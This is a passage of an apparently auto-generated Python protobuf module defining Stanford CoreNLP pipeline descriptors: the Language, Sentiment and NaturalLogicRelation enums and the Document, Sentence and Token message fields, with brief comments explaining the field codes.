\x01(\x0b\x32&.edu.stanford.nlp.pipeline.SpeakerInfo\x12=\n\rsentenceWords\x18\x32 \x03(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12<\n\x0coriginalSpan\x18\x33 \x03(\x0b\x32&.edu.stanford.nlp.pipeline.IndexedWord\x12\x12\n\ndependents\x18\x34 \x03(\t\x12\x19\n\x11preprocessedTerms\x18\x35 \x03(\t\x12\x13\n\x0b\x61ppositions\x18\x36 \x03(\x05\x12\x1c\n\x14predicateNominatives\x18\x37 \x03(\x05\x12\x18\n\x10relativePronouns\x18\x38 \x03(\x05\x12\x13\n\x0blistMembers\x18\x39 \x03(\x05\x12\x15\n\rbelongToLists\x18: \x03(\x05\"X\n\x0bIndexedWord\x12\x13\n\x0bsentenceNum\x18\x01 \x01(\r\x12\x12\n\ntokenIndex\x18\x02 \x01(\r\x12\r\n\x05\x64ocID\x18\x03 \x01(\r\x12\x11\n\tcopyCount\x18\x04 \x01(\r\"4\n\x0bSpeakerInfo\x12\x13\n\x0bspeakerName\x18\x01 \x01(\t\x12\x10\n\x08mentions\x18\x02 \x03(\x05\"\"\n\x04Span\x12\r\n\x05\x62\x65gin\x18\x01 \x02(\r\x12\x0b\n\x03\x65nd\x18\x02 \x02(\r\"w\n\x05Timex\x12\r\n\x05value\x18\x01 \x01(\t\x12\x10\n\x08\x61ltValue\x18\x02 \x01(\t\x12\x0c\n\x04text\x18\x03 \x01(\t\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0b\n\x03tid\x18\x05 \x01(\t\x12\x12\n\nbeginPoint\x18\x06 \x01(\r\x12\x10\n\x08\x65ndPoint\x18\x07 \x01(\r\"\xdb\x01\n\x06\x45ntity\x12\x11\n\theadStart\x18\x06 \x01(\r\x12\x0f\n\x07headEnd\x18\x07 \x01(\r\x12\x13\n\x0bmentionType\x18\x08 \x01(\t\x12\x16\n\x0enormalizedName\x18\t \x01(\t\x12\x16\n\x0eheadTokenIndex\x18\n \x01(\r\x12\x0f\n\x07\x63orefID\x18\x0b \x01(\t\x12\x10\n\x08objectID\x18\x01 \x01(\t\x12\x13\n\x0b\x65xtentStart\x18\x02 \x01(\r\x12\x11\n\textentEnd\x18\x03 \x01(\r\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0f\n\x07subtype\x18\x05 \x01(\t\"\xb7\x01\n\x08Relation\x12\x0f\n\x07\x61rgName\x18\x06 \x03(\t\x12.\n\x03\x61rg\x18\x07 \x03(\x0b\x32!.edu.stanford.nlp.pipeline.Entity\x12\x11\n\tsignature\x18\x08 \x01(\t\x12\x10\n\x08objectID\x18\x01 \x01(\t\x12\x13\n\x0b\x65xtentStart\x18\x02 \x01(\r\x12\x11\n\textentEnd\x18\x03 \x01(\r\x12\x0c\n\x04type\x18\x04 \x01(\t\x12\x0f\n\x07subtype\x18\x05 
\x01(\t\"\xb2\x01\n\x08Operator\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x1b\n\x13quantifierSpanBegin\x18\x02 \x02(\x05\x12\x19\n\x11quantifierSpanEnd\x18\x03 \x02(\x05\x12\x18\n\x10subjectSpanBegin\x18\x04 \x02(\x05\x12\x16\n\x0esubjectSpanEnd\x18\x05 \x02(\x05\x12\x17\n\x0fobjectSpanBegin\x18\x06 \x02(\x05\x12\x15\n\robjectSpanEnd\x18\x07 \x02(\x05\"\xa9\x04\n\x08Polarity\x12K\n\x12projectEquivalence\x18\x01 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12Q\n\x18projectForwardEntailment\x18\x02 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12Q\n\x18projectReverseEntailment\x18\x03 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12H\n\x0fprojectNegation\x18\x04 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12K\n\x12projectAlternation\x18\x05 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12\x45\n\x0cprojectCover\x18\x06 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\x12L\n\x13projectIndependence\x18\x07 \x02(\x0e\x32/.edu.stanford.nlp.pipeline.NaturalLogicRelation\"\xf1\x01\n\nNERMention\x12\x15\n\rsentenceIndex\x18\x01 \x01(\r\x12%\n\x1dtokenStartInSentenceInclusive\x18\x02 \x02(\r\x12#\n\x1btokenEndInSentenceExclusive\x18\x03 \x02(\r\x12\x0b\n\x03ner\x18\x04 \x02(\t\x12\x15\n\rnormalizedNER\x18\x05 \x01(\t\x12\x12\n\nentityType\x18\x06 \x01(\t\x12/\n\x05timex\x18\x07 \x01(\x0b\x32 .edu.stanford.nlp.pipeline.Timex\x12\x17\n\x0fwikipediaEntity\x18\x08 \x01(\t\"Y\n\x10SentenceFragment\x12\x12\n\ntokenIndex\x18\x01 \x03(\r\x12\x0c\n\x04root\x18\x02 \x01(\r\x12\x14\n\x0c\x61ssumedTruth\x18\x03 \x01(\x08\x12\r\n\x05score\x18\x04 \x01(\x01\"\x9c\x02\n\x0eRelationTriple\x12\x0f\n\x07subject\x18\x01 \x01(\t\x12\x10\n\x08relation\x18\x02 \x01(\t\x12\x0e\n\x06object\x18\x03 \x01(\t\x12\x12\n\nconfidence\x18\x04 \x01(\x01\x12\x15\n\rsubjectTokens\x18\x05 \x03(\r\x12\x16\n\x0erelationTokens\x18\x06 \x03(\r\x12\x14\n\x0cobjectTokens\x18\x07 \x03(\r\x12\x38\n\x04tree\x18\x08 
\x01(\x0b\x32*.edu.stanford.nlp.pipeline.DependencyGraph\x12\x0e\n\x06istmod\x18\t \x01(\x08\x12\x10\n\x08prefixBe\x18\n \x01(\x08\x12\x10\n\x08suffixBe\x18\x0b \x01(\x08\x12\x10\n\x08suffixOf\x18\x0c \x01(\x08\"-\n\x0fMapStringString\x12\x0b\n\x03key\x18\x01 \x03(\t\x12\r\n\x05value\x18\x02 \x03(\t\"*\n\x0cMapIntString\x12\x0b\n\x03key\x18\x01 \x03(\r\x12\r\n\x05value\x18\x02 \x03(\t*\x8d\x01\n\x08Language\x12\x0b\n\x07Unknown\x10\x00\x12\x07\n\x03\x41ny\x10\x01\x12\n\n\x06\x41rabic\x10\x02\x12\x0b\n\x07\x43hinese\x10\x03\x12\x0b\n\x07\x45nglish\x10\x04\x12\n\n\x06German\x10\x05\x12\n\n\x06\x46rench\x10\x06\x12\n\n\x06Hebrew\x10\x07\x12\x0b\n\x07Spanish\x10\x08\x12\x14\n\x10UniversalEnglish\x10\t*h\n\tSentiment\x12\x13\n\x0fSTRONG_NEGATIVE\x10\x00\x12\x11\n\rWEAK_NEGATIVE\x10\x01\x12\x0b\n\x07NEUTRAL\x10\x02\x12\x11\n\rWEAK_POSITIVE\x10\x03\x12\x13\n\x0fSTRONG_POSITIVE\x10\x04*\x93\x01\n\x14NaturalLogicRelation\x12\x0f\n\x0b\x45QUIVALENCE\x10\x00\x12\x16\n\x12\x46ORWARD_ENTAILMENT\x10\x01\x12\x16\n\x12REVERSE_ENTAILMENT\x10\x02\x12\x0c\n\x08NEGATION\x10\x03\x12\x0f\n\x0b\x41LTERNATION\x10\x04\x12\t\n\x05\x43OVER\x10\x05\x12\x10\n\x0cINDEPENDENCE\x10\x06\x42*\n\x19\x65\x64u.stanford.nlp.pipelineB\rCoreNLPProtos')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_LANGUAGE = _descriptor.EnumDescriptor(
name='Language',
full_name='edu.stanford.nlp.pipeline.Language',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unknown', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Any', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Arabic', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Chinese', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='English', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='German', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='French', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hebrew', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Spanish', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UniversalEnglish', index=9, number=9,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7344,
serialized_end=7485,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE)
Language = enum_type_wrapper.EnumTypeWrapper(_LANGUAGE)
_SENTIMENT = _descriptor.EnumDescriptor(
name='Sentiment',
full_name='edu.stanford.nlp.pipeline.Sentiment',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='STRONG_NEGATIVE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WEAK_NEGATIVE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEUTRAL', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WEAK_POSITIVE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STRONG_POSITIVE', index=4, number=4,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7487,
serialized_end=7591,
)
_sym_db.RegisterEnumDescriptor(_SENTIMENT)
Sentiment = enum_type_wrapper.EnumTypeWrapper(_SENTIMENT)
_NATURALLOGICRELATION = _descriptor.EnumDescriptor(
name='NaturalLogicRelation',
full_name='edu.stanford.nlp.pipeline.NaturalLogicRelation',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='EQUIVALENCE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORWARD_ENTAILMENT', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='REVERSE_ENTAILMENT', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEGATION', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ALTERNATION', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COVER', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INDEPENDENCE', index=6, number=6,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=7594,
serialized_end=7741,
)
_sym_db.RegisterEnumDescriptor(_NATURALLOGICRELATION)
NaturalLogicRelation = enum_type_wrapper.EnumTypeWrapper(_NATURALLOGICRELATION)
Unknown = 0
Any = 1
Arabic = 2
Chinese = 3
English = 4
German = 5
French = 6
Hebrew = 7
Spanish = 8
UniversalEnglish = 9
STRONG_NEGATIVE = 0
WEAK_NEGATIVE = 1
NEUTRAL = 2
WEAK_POSITIVE = 3
STRONG_POSITIVE = 4
EQUIVALENCE = 0
FORWARD_ENTAILMENT = 1
REVERSE_ENTAILMENT = 2
NEGATION = 3
ALTERNATION = 4
COVER = 5
INDEPENDENCE = 6
# Descriptor for the protobuf message 'edu.stanford.nlp.pipeline.Document'.
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 2=required, 3=repeated
#   type:  4=uint64, 9=string, 11=message
_DOCUMENT = _descriptor.Descriptor(
  name='Document',
  full_name='edu.stanford.nlp.pipeline.Document',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='text', full_name='edu.stanford.nlp.pipeline.Document.text', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentence', full_name='edu.stanford.nlp.pipeline.Document.sentence', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='corefChain', full_name='edu.stanford.nlp.pipeline.Document.corefChain', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='docID', full_name='edu.stanford.nlp.pipeline.Document.docID', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='docDate', full_name='edu.stanford.nlp.pipeline.Document.docDate', index=4,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='calendar', full_name='edu.stanford.nlp.pipeline.Document.calendar', index=5,
      number=8, type=4, cpp_type=4, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentencelessToken', full_name='edu.stanford.nlp.pipeline.Document.sentencelessToken', index=6,
      number=5, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='quote', full_name='edu.stanford.nlp.pipeline.Document.quote', index=7,
      number=6, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='mentions', full_name='edu.stanford.nlp.pipeline.Document.mentions', index=8,
      number=9, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=True,
  # Tag numbers 100-255 are reserved for extensions (range end is exclusive).
  extension_ranges=[(100, 256), ],
  oneofs=[
  ],
  serialized_start=45,
  serialized_end=407,
)
# Descriptor for the protobuf message 'edu.stanford.nlp.pipeline.Sentence'.
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 2=required, 3=repeated
#   type:  8=bool, 9=string, 11=message, 13=uint32
_SENTENCE = _descriptor.Descriptor(
  name='Sentence',
  full_name='edu.stanford.nlp.pipeline.Sentence',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='token', full_name='edu.stanford.nlp.pipeline.Sentence.token', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenOffsetBegin', full_name='edu.stanford.nlp.pipeline.Sentence.tokenOffsetBegin', index=1,
      number=2, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenOffsetEnd', full_name='edu.stanford.nlp.pipeline.Sentence.tokenOffsetEnd', index=2,
      number=3, type=13, cpp_type=3, label=2,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.Sentence.sentenceIndex', index=3,
      number=4, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='characterOffsetBegin', full_name='edu.stanford.nlp.pipeline.Sentence.characterOffsetBegin', index=4,
      number=5, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='characterOffsetEnd', full_name='edu.stanford.nlp.pipeline.Sentence.characterOffsetEnd', index=5,
      number=6, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='parseTree', full_name='edu.stanford.nlp.pipeline.Sentence.parseTree', index=6,
      number=7, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='binarizedParseTree', full_name='edu.stanford.nlp.pipeline.Sentence.binarizedParseTree', index=7,
      number=31, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='annotatedParseTree', full_name='edu.stanford.nlp.pipeline.Sentence.annotatedParseTree', index=8,
      number=32, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentiment', full_name='edu.stanford.nlp.pipeline.Sentence.sentiment', index=9,
      number=33, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='kBestParseTrees', full_name='edu.stanford.nlp.pipeline.Sentence.kBestParseTrees', index=10,
      number=34, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='basicDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.basicDependencies', index=11,
      number=8, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='collapsedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.collapsedDependencies', index=12,
      number=9, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='collapsedCCProcessedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.collapsedCCProcessedDependencies', index=13,
      number=10, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='alternativeDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.alternativeDependencies', index=14,
      number=13, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='openieTriple', full_name='edu.stanford.nlp.pipeline.Sentence.openieTriple', index=15,
      number=14, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='kbpTriple', full_name='edu.stanford.nlp.pipeline.Sentence.kbpTriple', index=16,
      number=16, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='entailedSentence', full_name='edu.stanford.nlp.pipeline.Sentence.entailedSentence', index=17,
      number=15, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='enhancedDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.enhancedDependencies', index=18,
      number=17, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='enhancedPlusPlusDependencies', full_name='edu.stanford.nlp.pipeline.Sentence.enhancedPlusPlusDependencies', index=19,
      number=18, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='paragraph', full_name='edu.stanford.nlp.pipeline.Sentence.paragraph', index=20,
      number=11, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='text', full_name='edu.stanford.nlp.pipeline.Sentence.text', index=21,
      number=12, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='hasRelationAnnotations', full_name='edu.stanford.nlp.pipeline.Sentence.hasRelationAnnotations', index=22,
      number=51, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='entity', full_name='edu.stanford.nlp.pipeline.Sentence.entity', index=23,
      number=52, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='relation', full_name='edu.stanford.nlp.pipeline.Sentence.relation', index=24,
      number=53, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='hasNumerizedTokensAnnotation', full_name='edu.stanford.nlp.pipeline.Sentence.hasNumerizedTokensAnnotation', index=25,
      number=54, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='mentions', full_name='edu.stanford.nlp.pipeline.Sentence.mentions', index=26,
      number=55, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='mentionsForCoref', full_name='edu.stanford.nlp.pipeline.Sentence.mentionsForCoref', index=27,
      number=56, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='hasCorefMentionsAnnotation', full_name='edu.stanford.nlp.pipeline.Sentence.hasCorefMentionsAnnotation', index=28,
      number=57, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='sentenceID', full_name='edu.stanford.nlp.pipeline.Sentence.sentenceID', index=29,
      number=58, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=True,
  # Tag numbers 100-255 are reserved for extensions (range end is exclusive).
  extension_ranges=[(100, 256), ],
  oneofs=[
  ],
  serialized_start=410,
  serialized_end=1925,
)
# Descriptor for the protobuf message 'edu.stanford.nlp.pipeline.Token'.
# NOTE(review): protoc-generated code — do not edit by hand; regenerate from
# the .proto instead. Numeric field codes follow descriptor.proto:
#   label: 1=optional, 2=required, 3=repeated
#   type:  5=int32, 8=bool, 9=string, 11=message, 13=uint32
_TOKEN = _descriptor.Descriptor(
  name='Token',
  full_name='edu.stanford.nlp.pipeline.Token',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='word', full_name='edu.stanford.nlp.pipeline.Token.word', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='pos', full_name='edu.stanford.nlp.pipeline.Token.pos', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='value', full_name='edu.stanford.nlp.pipeline.Token.value', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='category', full_name='edu.stanford.nlp.pipeline.Token.category', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='before', full_name='edu.stanford.nlp.pipeline.Token.before', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='after', full_name='edu.stanford.nlp.pipeline.Token.after', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='originalText', full_name='edu.stanford.nlp.pipeline.Token.originalText', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='ner', full_name='edu.stanford.nlp.pipeline.Token.ner', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='normalizedNER', full_name='edu.stanford.nlp.pipeline.Token.normalizedNER', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='lemma', full_name='edu.stanford.nlp.pipeline.Token.lemma', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='beginChar', full_name='edu.stanford.nlp.pipeline.Token.beginChar', index=10,
      number=11, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='endChar', full_name='edu.stanford.nlp.pipeline.Token.endChar', index=11,
      number=12, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='utterance', full_name='edu.stanford.nlp.pipeline.Token.utterance', index=12,
      number=13, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='speaker', full_name='edu.stanford.nlp.pipeline.Token.speaker', index=13,
      number=14, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='beginIndex', full_name='edu.stanford.nlp.pipeline.Token.beginIndex', index=14,
      number=15, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='endIndex', full_name='edu.stanford.nlp.pipeline.Token.endIndex', index=15,
      number=16, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenBeginIndex', full_name='edu.stanford.nlp.pipeline.Token.tokenBeginIndex', index=16,
      number=17, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='tokenEndIndex', full_name='edu.stanford.nlp.pipeline.Token.tokenEndIndex', index=17,
      number=18, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
